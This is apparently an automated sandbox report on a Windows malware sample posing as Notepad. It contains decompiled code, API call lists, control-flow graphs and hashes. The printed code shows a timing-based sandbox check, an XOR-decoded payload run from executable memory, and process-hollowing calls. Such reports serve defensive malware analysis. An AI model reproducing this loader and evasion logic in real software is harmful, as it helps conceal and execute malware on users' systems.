8721 480f81 VirtualAllocExNuma 8720->8721 8722 480f8e 8721->8722 8745 480e1f 8722->8745 8752 48005f GetPEB 8725->8752 8727 48066b 8728 480813 CreateFileW 8727->8728 8753 48037c 8727->8753 8728->7707 8728->7711 8733 48085e RegGetValueW 8733->8728 8734 48087b RegOpenKeyExW 8733->8734 8734->8733 8735 480897 RegSetValueExW 8734->8735 8735->8728 8737->8714 8738->8716 8739->8718 8750 48005f GetPEB 8740->8750 8742 480ecf 8743 480ed5 GetSystemInfo 8742->8743 8744 480f00 8743->8744 8744->8720 8751 48005f GetPEB 8745->8751 8747 480e2b 8748 480e4b VirtualAlloc 8747->8748 8749 480e68 8748->8749 8749->7708 8750->8742 8751->8747 8752->8727 8769 48005f GetPEB 8753->8769 8755 4803d6 8756 480401 PathFileExistsW 8755->8756 8757 48041a 8756->8757 8758 48040d CreateDirectoryW 8756->8758 8757->8728 8759 48020a 8757->8759 8758->8757 8770 48005f GetPEB 8759->8770 8761 48026a 8762 4802db PathFileExistsW 8761->8762 8763 4802ec CreateFileW 8762->8763 8764 480309 8762->8764 8763->8764 8765 48030d 8763->8765 8764->8728 8764->8733 8765->8764 8766 480318 VirtualAlloc 8765->8766 8766->8764 8767 48032e ReadFile 8766->8767 8767->8764 8768 48033d FindCloseChangeNotification CreateFileW WriteFile 8767->8768 8768->8764 8769->8755 8770->8761 8772 40152c SetRect lstrcpyW LoadStringW LoadStringW RegOpenKeyW 8771->8772 8772->7721 8772->7722 8774 4010b1 MulDiv 8773->8774 8775 401073 RegQueryValueExW 8773->8775 8774->7766 8776 4010a8 RegCloseKey 8775->8776 8777 40109a 8775->8777 8776->8774 8777->8776 8778->7788 8779->7792 8783 40682f 8780->8783 8782 406996 8784 40683b __tsopen_nolock 8783->8784 8785 40a357 __lock 61 API calls 8784->8785 8786 406842 8785->8786 8788 40686d DecodePointer 8786->8788 8792 4068ec 8786->8792 8789 406884 DecodePointer 8788->8789 8788->8792 8802 406897 8789->8802 8791 406969 __tsopen_nolock 8791->8782 8806 40695a 8792->8806 8795 406951 8796 406717 _doexit 3 API calls 8795->8796 8797 40695a 8796->8797 8798 406967 8797->8798 8811 40a27e LeaveCriticalSection 8797->8811 8798->8782 8799 4068ae DecodePointer 8805 4070f9 RtlEncodePointer 8799->8805 8802->8792 8802->8799 8803 4068bd DecodePointer DecodePointer 8802->8803 8804 4070f9 RtlEncodePointer 8802->8804 8803->8802 8804->8802 8805->8802 8807 406960 8806->8807 8808 40693a 8806->8808 8812 40a27e LeaveCriticalSection 8807->8812 8808->8791 8810 40a27e LeaveCriticalSection 8808->8810 8810->8795 8811->8798 8812->8808 9564 4086a9 9567 40a27e LeaveCriticalSection 9564->9567 9566 4086b0 9567->9566 9009 40b0eb 9010 40b0ee 9009->9010 9013 40ecd1 9010->9013 9022 40b166 DecodePointer 9013->9022 9015 40ece1 9018 40ecf9 9015->9018 9019 40353d __call_reportfault 8 API calls 9015->9019 9016 40ecd6 9016->9015 9023 40b173 9016->9023 9020 406985 _raise 66 API calls 9018->9020 9019->9018 9021 40ed03 9020->9021 9022->9016 9026 40b17f __tsopen_nolock 9023->9026 9024 40b1da 9025 40b1bc DecodePointer 9024->9025 9030 40b1e9 9024->9030 9031 40b1ab _siglookup 9025->9031 9026->9024 9026->9025 9027 40b1a6 9026->9027 9033 40b1a2 9026->9033 9028 407230 __getptd_noexit 66 API calls 9027->9028 9028->9031 9032 40370a __vswprintf_helper 66 API calls 9030->9032 9035 40b246 9031->9035 9036 40b1b4 __tsopen_nolock 9031->9036 9038 406985 _raise 66 API calls 9031->9038 9034 40b1ee 9032->9034 9033->9027 9033->9030 9037 4036b8 __vswprintf_helper 11 API calls 9034->9037 9039 40a357 __lock 66 API calls 9035->9039 9040 40b251 9035->9040 9036->9015 9037->9036 9038->9035 9039->9040 9042 40b286 9040->9042 9044 4070f9 RtlEncodePointer 9040->9044 9045 40b2da 9042->9045 9044->9042 9046 40b2e0 9045->9046 9048 40b2e7 9045->9048 9049 40a27e LeaveCriticalSection 9046->9049 9048->9036 9049->9048 8813 4070f9 RtlEncodePointer

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 74%
                                                                                  			E00402571(signed long long __fp0, struct HINSTANCE__* _a4, void* _a12, int _a16) {
                                                                                  				_Unknown_base(*)()* _v8;
                                                                                  				_Unknown_base(*)()* _v12;
                                                                                  				_Unknown_base(*)()* _v16;
                                                                                  				struct tagMSG _v44;
                                                                                  				intOrPtr _v52;
                                                                                  				intOrPtr _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				struct tagMONITORINFO _v84;
                                                                                  				struct _WNDCLASSEXW _v132;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				void* _t54;
                                                                                  				void* _t55;
                                                                                  				struct HINSTANCE__* _t63;
                                                                                  				int _t65;
                                                                                  				struct HMONITOR__* _t70;
                                                                                  				int _t72;
                                                                                  				struct HWND__* _t73;
                                                                                  				int _t81;
                                                                                  				int _t83;
                                                                                  				int _t85;
                                                                                  				void* _t92;
                                                                                  				long _t94;
                                                                                  				WCHAR* _t104;
                                                                                  				int _t106;
                                                                                  				struct HACCEL__* _t107;
                                                                                  				long _t108;
                                                                                  				intOrPtr _t110;
                                                                                  				signed int _t112;
                                                                                  				intOrPtr _t114;
                                                                                  				int _t117;
                                                                                  				void* _t119;
                                                                                  				void* _t121;
                                                                                  				signed int _t122;
                                                                                  				void* _t127;
                                                                                  				signed long long _t135;
                                                                                  
                                                                                  				_t135 = __fp0;
                                                                                  				_t104 = L"Kernel32.dll";
                                                                                  				_v8 = GetProcAddress(GetModuleHandleW(_t104), "GetTickCount");
                                                                                  				_v12 = GetProcAddress(GetModuleHandleW(_t104), "Sleep");
                                                                                  				_v16 = GetProcAddress(GetModuleHandleW(_t104), "VirtualAlloc");
                                                                                  				_t54 = _v8();
                                                                                  				Sleep(0x2be);
                                                                                  				_t55 = _v8();
                                                                                  				_t131 = _t55 - _t54 - 0x2bc;
                                                                                  				if(_t55 - _t54 < 0x2bc) {
                                                                                  					L4:
                                                                                  					 *0x4151c0 = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                                                  					E004031B0(0x415f60, 0, 0x11f4);
                                                                                  					 *0x415f60 = _a4;
                                                                                  					E004014EC(_t113, _t135);
                                                                                  					_t117 = 0x30;
                                                                                  					E004031B0( &_v132, 0, _t117);
                                                                                  					_t63 =  *0x415f60; // 0x0
                                                                                  					_v132.cbSize = _t117;
                                                                                  					_v132.lpfnWndProc = E0040232A;
                                                                                  					_v132.hInstance = _t63;
                                                                                  					_v132.hIcon = LoadIconW(_t63, 0x300);
                                                                                  					_t65 = GetSystemMetrics(0x32);
                                                                                  					_v132.hIconSm = LoadImageW( *0x415f60, 0x300, 1, GetSystemMetrics(0x31), _t65, 0x8000);
                                                                                  					_v132.hCursor = LoadCursorW(0, 0x7f00);
                                                                                  					_v132.hbrBackground = 6;
                                                                                  					_v132.lpszMenuName = 0x201;
                                                                                  					_v132.lpszClassName = L"Notepad";
                                                                                  					_t70 = RegisterClassExW( &_v132);
                                                                                  					if(_t70 == 0) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					__imp__MonitorFromRect(0x4151c4, 1);
                                                                                  					_v84.cbSize = 0x28;
                                                                                  					GetMonitorInfoW(_t70,  &_v84);
                                                                                  					_t72 =  *0x4151c4; // 0x0
                                                                                  					_t119 =  *0x4151c8; // 0x0
                                                                                  					_t110 =  *0x4151d0; // 0x0
                                                                                  					_t114 =  *0x4151cc; // 0x0
                                                                                  					_t106 = _t72;
                                                                                  					_a12 = _t119;
                                                                                  					__eflags = _t72 - _v56;
                                                                                  					if(_t72 >= _v56) {
                                                                                  						L10:
                                                                                  						_a12 = 0x80000000;
                                                                                  						_t106 = 0x80000000;
                                                                                  						L11:
                                                                                  						_t73 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t106, _a12, _t114 - _t72, _t110 - _t119, 0, 0,  *0x415f60, 0);
                                                                                  						 *0x415f64 = _t73;
                                                                                  						__eflags = _t73;
                                                                                  						if(_t73 != 0) {
                                                                                  							E00401ABC();
                                                                                  							0x400000();
                                                                                  							ShowWindow( *0x415f64, _a16);
                                                                                  							UpdateWindow( *0x415f64);
                                                                                  							DragAcceptFiles( *0x415f64, 1);
                                                                                  							E00401F93(GetCommandLineW());
                                                                                  							_t107 = LoadAcceleratorsW(_a4, 0x203);
                                                                                  							while(1) {
                                                                                  								_t81 = GetMessageW( &_v44, 0, 0, 0);
                                                                                  								__eflags = _t81;
                                                                                  								if(_t81 == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t83 = IsDialogMessageW( *0x415f68,  &_v44);
                                                                                  								__eflags = _t83;
                                                                                  								if(_t83 == 0) {
                                                                                  									_t85 = TranslateAcceleratorW( *0x415f64, _t107,  &_v44);
                                                                                  									__eflags = _t85;
                                                                                  									if(_t85 == 0) {
                                                                                  										TranslateMessage( &_v44);
                                                                                  										DispatchMessageW( &_v44);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  							return _v44.wParam;
                                                                                  						}
                                                                                  						0x400000();
                                                                                  						ExitProcess(1);
                                                                                  					}
                                                                                  					__eflags = _t119 - _v52;
                                                                                  					if(_t119 >= _v52) {
                                                                                  						goto L10;
                                                                                  					}
                                                                                  					__eflags = _t114 - _v84.rcWork;
                                                                                  					if(_t114 < _v84.rcWork) {
                                                                                  						goto L10;
                                                                                  					}
                                                                                  					__eflags = _t110 - _v60;
                                                                                  					if(_t110 >= _v60) {
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				_t92 = E0040318F(_a12, L"rb"); // executed
                                                                                  				_push(2);
                                                                                  				_t121 = _t92;
                                                                                  				_push(0);
                                                                                  				_push(_t121); // executed
                                                                                  				E00403055(_t104, _t121, 0, _t131); // executed
                                                                                  				_push(_t121); // executed
                                                                                  				_t94 = E00402F66(_t104, _t121, 0, _t131); // executed
                                                                                  				_push(0);
                                                                                  				_push(0);
                                                                                  				_push(_t121);
                                                                                  				_t108 = _t94; // executed
                                                                                  				E00403055(_t108, _t121, 0, _t131); // executed
                                                                                  				_a12 = VirtualAlloc(0, _t108, 0x3000, 0x40);
                                                                                  				E00402DB5(_t96, _t108, 1, _t121); // executed
                                                                                  				_t127 = _t127 + 0x34;
                                                                                  				_t112 = 0;
                                                                                  				if(_t108 <= 0) {
                                                                                  					L3:
                                                                                  					_a12();
                                                                                  					goto L4;
                                                                                  				} else {
                                                                                  					goto L2;
                                                                                  				}
                                                                                  				do {
                                                                                  					L2:
                                                                                  					_v16 = _a12 + _t112;
                                                                                  					asm("cdq");
                                                                                  					_t122 = 0xc;
                                                                                  					_t113 = _t112 % _t122;
                                                                                  					 *_v16 =  *_v16 ^  *("248058040134" + _t112 % _t122);
                                                                                  					_t112 = _t112 + 1;
                                                                                  				} while (_t112 < _t108);
                                                                                  				goto L3;
                                                                                  			}









































                                                                                  0x00402571
                                                                                  0x00402588
                                                                                  0x0040259f
                                                                                  0x004025ad
                                                                                  0x004025b5
                                                                                  0x004025b8
                                                                                  0x004025c2
                                                                                  0x004025c5
                                                                                  0x004025cc
                                                                                  0x004025d1
                                                                                  0x00402643
                                                                                  0x00402659
                                                                                  0x0040265f
                                                                                  0x0040266a
                                                                                  0x0040266f
                                                                                  0x00402676
                                                                                  0x0040267d
                                                                                  0x00402682
                                                                                  0x00402691
                                                                                  0x00402694
                                                                                  0x0040269b
                                                                                  0x004026b1
                                                                                  0x004026b4
                                                                                  0x004026d1
                                                                                  0x004026da
                                                                                  0x004026e1
                                                                                  0x004026e8
                                                                                  0x004026ef
                                                                                  0x004026f6
                                                                                  0x004026ff
                                                                                  0x00000000
                                                                                  0x00402701
                                                                                  0x0040270f
                                                                                  0x0040271a
                                                                                  0x00402721
                                                                                  0x00402727
                                                                                  0x0040272c
                                                                                  0x00402732
                                                                                  0x00402738
                                                                                  0x0040273e
                                                                                  0x00402740
                                                                                  0x00402743
                                                                                  0x00402746
                                                                                  0x00402757
                                                                                  0x00402757
                                                                                  0x0040275e
                                                                                  0x00402763
                                                                                  0x00402786
                                                                                  0x0040278c
                                                                                  0x00402791
                                                                                  0x00402793
                                                                                  0x004027a2
                                                                                  0x004027a7
                                                                                  0x004027b5
                                                                                  0x004027c1
                                                                                  0x004027cf
                                                                                  0x004027db
                                                                                  0x004027f4
                                                                                  0x00402835
                                                                                  0x0040283c
                                                                                  0x0040283e
                                                                                  0x00402840
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402802
                                                                                  0x00402808
                                                                                  0x0040280a
                                                                                  0x00402817
                                                                                  0x0040281d
                                                                                  0x0040281f
                                                                                  0x00402825
                                                                                  0x0040282f
                                                                                  0x0040282f
                                                                                  0x0040281f
                                                                                  0x0040280a
                                                                                  0x00000000
                                                                                  0x00402842
                                                                                  0x00402795
                                                                                  0x0040279c
                                                                                  0x0040279c
                                                                                  0x00402748
                                                                                  0x0040274b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040274d
                                                                                  0x00402750
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402752
                                                                                  0x00402755
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402755
                                                                                  0x004025db
                                                                                  0x004025e0
                                                                                  0x004025e2
                                                                                  0x004025e4
                                                                                  0x004025e5
                                                                                  0x004025e6
                                                                                  0x004025eb
                                                                                  0x004025ec
                                                                                  0x004025f1
                                                                                  0x004025f2
                                                                                  0x004025f3
                                                                                  0x004025f4
                                                                                  0x004025f6
                                                                                  0x0040260f
                                                                                  0x00402612
                                                                                  0x00402617
                                                                                  0x0040261a
                                                                                  0x0040261e
                                                                                  0x00402640
                                                                                  0x00402640
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402620
                                                                                  0x00402620
                                                                                  0x00402625
                                                                                  0x0040262a
                                                                                  0x0040262d
                                                                                  0x0040262e
                                                                                  0x00402639
                                                                                  0x0040263b
                                                                                  0x0040263c
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 0040258E
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402597
                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 004025A2
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004025A5
                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 004025B0
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004025B3
                                                                                  • Sleep.KERNELBASE(000002BE), ref: 004025C2
                                                                                  • _fseek.LIBCMT ref: 004025E6
                                                                                  • _fseek.LIBCMT ref: 004025F6
                                                                                    • Part of subcall function 00403055: __lock_file.LIBCMT ref: 00403096
                                                                                    • Part of subcall function 00403055: __fseek_nolock.LIBCMT ref: 004030A7
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00402607
                                                                                  • __fread_nolock.LIBCMT ref: 00402612
                                                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 00402648
                                                                                  • _memset.LIBCMT ref: 0040265F
                                                                                  • _memset.LIBCMT ref: 0040267D
                                                                                  • LoadIconW.USER32(00000000,00000300), ref: 0040269E
                                                                                  • GetSystemMetrics.USER32 ref: 004026B4
                                                                                  • GetSystemMetrics.USER32 ref: 004026B9
                                                                                  • LoadImageW.USER32 ref: 004026C5
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004026D4
                                                                                  • RegisterClassExW.USER32 ref: 004026F6
                                                                                    • Part of subcall function 0040318F: __wfsopen.LIBCMT ref: 0040319C
                                                                                  • MonitorFromRect.USER32(004151C4,00000001), ref: 0040270F
                                                                                  • GetMonitorInfoW.USER32 ref: 00402721
                                                                                  • CreateWindowExW.USER32 ref: 00402786
                                                                                  • ExitProcess.KERNEL32 ref: 0040279C
                                                                                  • ShowWindow.USER32(?), ref: 004027B5
                                                                                  • UpdateWindow.USER32 ref: 004027C1
                                                                                  • DragAcceptFiles.SHELL32(00000001), ref: 004027CF
                                                                                  • GetCommandLineW.KERNEL32 ref: 004027D5
                                                                                  • LoadAcceleratorsW.USER32 ref: 004027E8
                                                                                  • IsDialogMessageW.USER32(?), ref: 00402802
                                                                                  • TranslateAcceleratorW.USER32(00000000,?), ref: 00402817
                                                                                  • TranslateMessage.USER32(?), ref: 00402825
                                                                                  • DispatchMessageW.USER32 ref: 0040282F
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040283C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptAllocClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowSleepUpdateVirtual__fread_nolock__fseek_nolock__lock_file__wfsopen
                                                                                  • String ID: ($GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
                                                                                  • API String ID: 1051210470-2062807747
                                                                                  • Opcode ID: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
                                                                                  • Instruction ID: 86ed525f5f6418c5d4d27ac436486db8ae60d9136c2ac2c32b89dc552047780a
                                                                                  • Opcode Fuzzy Hash: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
                                                                                  • Instruction Fuzzy Hash: AE816D71940208BBDB10AFA5DD4DFDE7FB8EB48704F10443AF500A61A1D7B99981CB68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 312 480f9c-4811b9 call 48005f call 480f1d call 480073 * 8 334 4811bb 312->334 335 4811c0-4811d3 312->335 336 481638-48163b 334->336 338 4811da-481211 call 480422 CreateFileW 335->338 339 4811d5 335->339 342 481218-481247 VirtualAlloc ReadFile 338->342 343 481213 338->343 339->336 344 481249 342->344 345 48124e-481261 342->345 343->336 344->336 347 48161f-48162e call 4808ef 345->347 348 481267-48161a 345->348 351 481630-481632 ExitProcess 347->351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocNumaVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4233825816-0
                                                                                  • Opcode ID: 1c7147bf34f78ff358abaab479f68c2818ad3ac4607ad9030e88490da089793e
                                                                                  • Instruction ID: 9fdb7909f3c42d39227716b2dbb7463b9eb50c12ad80e59a47b806a10a7aca6e
                                                                                  • Opcode Fuzzy Hash: 1c7147bf34f78ff358abaab479f68c2818ad3ac4607ad9030e88490da089793e
                                                                                  • Instruction Fuzzy Hash: EF32D620D5D3D8ADDF12CBE994117FCBFB09F1A201F1844CAE494F6292D23A478ADB25
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 527 480ebf-480f05 call 48005f call 480073 GetSystemInfo 533 480f0e 527->533 534 480f07-480f0a 527->534 535 480f10-480f13 533->535 534->535
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNELBASE(?), ref: 00480EDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 31276548-0
                                                                                  • Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                                                                                  • Instruction ID: 1e168db6e0878d3e90c47af3bcfa01028a29ef0934e4e8a357b2954e68a76c07
                                                                                  • Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                                                                                  • Instruction Fuzzy Hash: B7F0A771D2410CABDB98F6B89846AAE77ACDB09200F10896EE706D2240D578C5444769
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00481ED2,7FAB7E30), ref: 00481702
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040), ref: 0048172C
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000), ref: 00481743
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040), ref: 00481765
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040,?,00000000,0000000E), ref: 004817D7
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040,?), ref: 004817E2
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040,?), ref: 0048182D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                  • String ID:
                                                                                  • API String ID: 656311269-0
                                                                                  • Opcode ID: 7c0ab75c56e8c76ece55b700bc8b5fe8c2a98b772918e02627d31dd295609cbd
                                                                                  • Instruction ID: 2007e5f95bc7f95503861dd7072f361862d74fbb52945922b8adc8d860a117db
                                                                                  • Opcode Fuzzy Hash: 7c0ab75c56e8c76ece55b700bc8b5fe8c2a98b772918e02627d31dd295609cbd
                                                                                  • Instruction Fuzzy Hash: C7519171E10318ABDB10AFF5DC85BAEB7B8AF05714F10891BF911F7290D77899018B68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 98 48020a-4802e6 call 48005f call 480073 * 8 PathFileExistsW 118 4802ec-480307 CreateFileW 98->118 119 480373-480379 98->119 120 480309-48030b 118->120 121 48030d-480316 118->121 120->119 121->120 123 480318-48032c VirtualAlloc 121->123 123->120 124 48032e-48033b ReadFile 123->124 124->120 125 48033d-480368 FindCloseChangeNotification CreateFileW WriteFile 124->125 126 48036a-48036c 125->126 127 48036d-480371 125->127 126->127 127->119
                                                                                  APIs
                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 004802E1
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 004802FF
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00480324
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00480336
                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0048033E
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 00480354
                                                                                  • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00480363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$AllocChangeCloseExistsFindNotificationPathReadVirtualWrite
                                                                                  • String ID:
                                                                                  • API String ID: 2600930906-0
                                                                                  • Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                                                                                  • Instruction ID: 0e011e1f2ff4ac72c8a7dd6c2a127a897981ff4c6e5640dd9c991066836c4e91
                                                                                  • Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                                                                                  • Instruction Fuzzy Hash: FE418D75A10208BAEB10AFF1EC56FAFB678EF45750F10491BF910F6290E7798A048769
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 129 4808ef-48090a call 48005f 132 48090d-480911 129->132 133 480929-480936 132->133 134 480913-480927 132->134 135 480939-48093d 133->135 134->132 136 48093f-480953 135->136 137 480955-480962 135->137 136->135 138 480965-480969 137->138 139 48096b-48097f 138->139 140 480981-480a5f call 480073 * 8 138->140 139->138 157 480a61-480a6b 140->157 158 480a76 140->158 157->158 159 480a6d-480a74 157->159 160 480a7a-480a96 158->160 159->160 162 480a98-480a9a 160->162 163 480a9f 160->163 164 480e19-480e1c 162->164 165 480aa6-480ace CreateProcessW 163->165 166 480ad0 165->166 167 480ad5-480aee GetThreadContext 165->167 168 480dcd-480dd1 166->168 169 480af0 167->169 170 480af5-480b12 ReadProcessMemory 167->170 173 480dd3-480dd7 168->173 174 480e16-480e18 168->174 169->168 171 480b19-480b22 170->171 172 480b14 170->172 175 480b49-480b68 call 481a82 171->175 176 480b24-480b33 171->176 172->168 177 480dd9-480de4 173->177 178 480dea-480dee 173->178 174->164 191 480b6a 175->191 192 480b6f-480b90 call 481b9c 175->192 176->175 179 480b35-480b3b call 4819ed 176->179 177->178 181 480df0 178->181 182 480df6-480dfa 178->182 190 480b40-480b42 179->190 181->182 183 480dfc 182->183 184 480e02-480e06 182->184 183->184 188 480e08-480e0d call 4819ed 184->188 189 480e12-480e14 184->189 188->189 189->164 190->175 194 480b44 190->194 191->168 197 480b92-480b99 192->197 198 480bd5-480bf5 call 481b9c 192->198 194->168 199 480b9b-480bc7 call 481b9c 197->199 200 480bd0 197->200 205 480bfc-480c11 call 4800da 198->205 206 480bf7 198->206 207 480bc9 199->207 208 480bce 199->208 200->168 211 480c1a-480c24 205->211 206->168 207->168 208->198 212 480c56-480c5a 211->212 213 480c26-480c54 call 4800da 211->213 215 480d3a-480d56 call 48183b 212->215 216 480c60-480c6e 212->216 213->211 223 480d58 215->223 224 480d5a-480d7b SetThreadContext 215->224 216->215 219 480c74-480c82 216->219 219->215 222 480c88-480ca8 219->222 225 480cab-480caf 222->225 223->168 226 480d7d 224->226 227 480d7f-480d89 call 48193c 224->227 225->215 228 480cb5-480cca 225->228 226->168 234 480d8b 227->234 235 480d8d-480d91 227->235 230 480cdc-480ce0 228->230 232 480d1d-480d35 230->232 233 480ce2-480cee 230->233 232->225 236 480d1b 233->236 237 480cf0-480d19 233->237 234->168 238 480d99-480d9d 235->238 239 480d93 235->239 236->230 237->236 241 480d9f 238->241 242 480da5-480da9 238->242 239->238 241->242 243 480dab 242->243 244 480db1-480db5 242->244 243->244 245 480dc1-480dc7 244->245 246 480db7-480dbc call 4819ed 244->246 245->165 245->168 246->245
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: D
                                                                                  • API String ID: 0-2746444292
                                                                                  • Opcode ID: e3089470e43f2722dd2c6064ea87a7aa536657f659faca682a86d07b654df7ff
                                                                                  • Instruction ID: a2e6684b66b0a03513722700e4f0ef80260ec68d79df42484568c54d85124995
                                                                                  • Opcode Fuzzy Hash: e3089470e43f2722dd2c6064ea87a7aa536657f659faca682a86d07b654df7ff
                                                                                  • Instruction Fuzzy Hash: 97021570E10208EFDB54EF94CD85BADBBB5BF04304F20445AE515BA2A1D778AE89DF18
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
